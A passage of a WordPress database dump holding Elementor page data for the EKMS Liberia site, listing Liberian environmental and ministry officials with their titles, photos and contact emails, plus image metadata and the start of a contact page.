ollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23203,3360,'_wp_attached_file','2021/01/kumeh.png'),(23204,3360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/01/kumeh.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"kumeh-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"kumeh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23205,3361,'_elementor_edit_mode','builder'),(23206,3361,'_elementor_template_type','wp-page'),(23207,3361,'_elementor_version','3.0.16'),(23208,3361,'_wp_page_template','default'),(23209,3361,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form 